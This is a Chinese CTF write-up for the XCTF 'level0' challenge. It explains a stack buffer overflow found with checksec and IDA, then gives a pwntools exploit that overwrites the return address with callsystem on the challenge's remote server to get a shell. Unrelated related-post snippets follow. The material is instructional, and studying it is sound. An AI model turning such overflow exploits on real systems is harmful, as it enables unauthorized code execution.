XCTF level0

HCl4y 等级 605 0 0
标签: httpspngPython

file查看文件类型,checksec检查保护机制

XCTF level0

64位ELF文件,没有开启保护机制

IDA查看伪码

XCTF level0

主函数输出"Hello,World!"后调用函数vulnerable_function()

XCTF level0

在函数vulnerable_function()中,每次读取200Byte的字节存储在buf中

XCTF level0

buf的空间只有80Byte,存在栈溢出

shift+F12搜索字符串

XCTF level0

发现"/bin/sh"位于函数callsystem中,可以通过栈溢出覆盖返回地址为callsystem执行system函数

构造exp

from pwn import *

context(os='linux',arch="amd64",log_level="debug") 

content = 0

def main():
    if content == 1:
        os = process("level0")
    else:
        os = remote("220.249.52.133",53332)

    payload =b'a'*(0x88)+p64(0x400596)  # buf容量为80Byte,加上8Byte栈底距返回地址长度加上callsystem地址

    os.recvuntil("Hello, World\n")

    os.sendline(payload)

    os.interactive()

main()

flag

XCTF level0

收藏
评论区

相关推荐

原来Python绘图也可以这么漂亮,这次真的是学习到了!
(https://imghelloworld.osscnbeijing.aliyuncs.com/8830803f033eeed85783e9058cf08968.png) 作者:朱小五 来源:快学Python 👆人生苦短,快学Python! 最近看了一篇文章《一个牛逼的Python 可视化库:PyG2Plot》,可惜只是简单介
XCTF when_did_you_born
使用file查看文件是多少位可以看出是Linux系统下的64位ELF文件用checksec检查文件保护有金丝雀(canary)还有堆的保护运行程序当输入数据过长时,显示程序段错误,直接崩溃了,说明是可能存在栈溢出的,但是存在canary保护,可能不是直接溢出IDA中汇编出伪C代码输入v5如果是1926直接退出,如果不是再用ge
XCTF hello_pwn
使用file查看文件是多少位Linux系统下的64位ELF文件用checksec检查文件保护没有canary保护IDA中汇编出伪C代码从unk_601068中读取10个字节,再读取dword_60106C中数据与1853186401比较,unk_601068,dword_60106C都是在段中exp打远程得到flag
XCTF level0
file查看文件类型,checksec检查保护机制64位ELF文件,没有开启保护机制IDA查看伪码主函数输出"Hello,World"后调用函数vulnerable_function()在函数vulnerable_function()中,每次读取200Byte的字节存储在buf中buf的空间只有80Byte,存在栈溢出shiftF12
HTTPS
### 最近网站更新为https,于是做个笔记 ### 将域名 [www.domain.com](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Fwww.domain.com) 的证书文件1\_www.domain.com\_bundle.crt 、 ### 私钥文件2\_www.doma
21天Python入门必备第一章
21天Python入门必备第一章 ================ <a name="FK7LH"></a> 课程介绍 ==== ![image.png](https://oscimg.oschina.net/oscnet/2cb9f9c4b989e8dc8f621dfe33e24aee167.png) ![image.png](https://os
64 岁 Python 之父退休失败,正式加入微软搞开源!
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X2dpZi9wdHA4UDE4NHhqeWQ5YWZjN1h5V3cxTFUzNnRoQ3lOckg2eWJLWWNQRjZJNDdKTjJrMzRHRXh3VmdSMVdqeHFFS1A5cVpYRmYyTUJpYW
Django Drops
**1.Django Intro** ------------------ ![Django Archite](https://oscimg.oschina.net/oscnet/aa07f912f646b3bf567d5b9bba9398d1435.png) **2.Django Install** -------------------- ###
Python 3 教程
Python 3 教程 =========== ![python3](https://www.runoob.com/wp-content/uploads/2014/05/python3.png) Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,
Python version 3.5 does not support variable...
背景 == 目前处于FastAPI学习初期,使用环境是: * Win7 64 bits SP1 * PyCharm 2016.3 * Python 3.8.4 * FastAPI 0.60.1 问题截图 ==== ![Python version 3.5 does not support variable...](https://s4
Python3 基本语法学习
1、查看Python版本及打印“Hellow World!”: ![](https://oscimg.oschina.net/oscnet/a61bad2f19989010fb3b0138321e93a4e49.png) 需要注意的是:在打印“Hello World”之前一定要先执行 python,否则会报无法 “无法初始化设备 PRN”,如图: ![
Python中文转换报错 'ascii' codec can't decode byte 0xe8 in position
 脚本报错: ![](https://oscimg.oschina.net/oscnet/5b8eaa4be291c9583f3fac05a59733caabf.png) 脚本代码: ![](https://oscimg.oschina.net/oscnet/3bbeff251f60674ece9d67de1e68463fbb1.png) 报错原因:
Python真是什么都能干!今天实现一下自动打开和运行电脑软件!
最近做项目,要用到软件自动化的操作,正好更大家分享一下! ![](https://img2018.cnblogs.com/blog/1627425/201909/1627425-20190911205328415-1196306902.png) 先看看Python操作: ============ ![都说了Python很牛逼!教大家用Pytho
Python脚本批量转换Webp为png或jpg
话说,Android开发的时,很多的应用已经将png或jpg改为了Webp格式,一个目的是为了减少包的体积,我觉得还有一个好处是资源包的安全考虑,不过我如果要反编译人家的apk,并拿到图片资源就比较恶心。这不,我今天想仿下网易严选,不过反编译后,发现图片都是webp格式的。心里想着,能不能使用Python编写一个一键转换工具呢? 答案是肯定的,由于Pyth
svg转png
svg转png网络上常用的方式有两种: 1.直接转base64放到图片src进行显示,测试效果不佳,始终报方法问题。 2.先转canvas,再转为png图,测试效果可以但svg透明背景到了canvas转换会变黑。 推荐使用方法三: 复制链接下载svg转png的js http://p8sv0x8g6.bkt.clouddn.com/saveSvgAs

热门文章

XCTF hello_pwnXCTF when_did_you_born

最新文章

XCTF hello_pwnXCTF when_did_you_born